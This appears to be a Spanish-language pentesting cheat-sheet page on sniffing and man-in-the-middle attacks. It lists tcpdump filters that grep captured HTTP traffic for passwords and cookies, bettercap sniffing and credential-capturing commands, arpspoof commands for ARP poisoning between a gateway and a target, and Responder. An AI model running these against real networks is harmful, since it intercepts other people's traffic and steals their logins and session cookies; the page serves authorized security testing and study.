Sniffing y MitM attack

Sniffing y MitM attack (Man in the middle attack)

Tcpdump

tcpdump -i <interface>
tcpdump -i <interface> -v src <source-IP-address> and dst <destination-IP-address> and port <port>
tcpdump -i <interface> -v port 80 | egrep -i "POST /|GET /|Host:"
tcpdump -i <interface> -v port 80 | egrep -i "POST /|GET /|clave=|pwd=|passwd=|password=|Host:"
tcpdump -i <interface> -v port 80 | egrep -i "Set-Cookie:|Cookie:|Host:"
tcpdump -r <file.pcap>

Ettercap

ettercap -G

Bettercap

# General
bettercap
net.probe on
net.recon on
net.sniff on
net.show
events.show

# Selección de interfaz
bettercap -iface <interface>

# Sniffing host y puerto específico
set net.sniff.filter "host <IP-address> and port <port>"
net.sniff on
events.show

# Interfaz de usuario (user:pass)
bettercap -caplet http-ui

ARPspoof

arpspoof -i <interface> -t <gateway-IP-address> <target-IP-address>
arpspoof -i <interface> -t <target-IP-address> <gateway-IP-address>

Responder

responder -I <interface> -A
AnteriorDescubrimiento de hostSiguienteEscaneo de puertos

Última actualización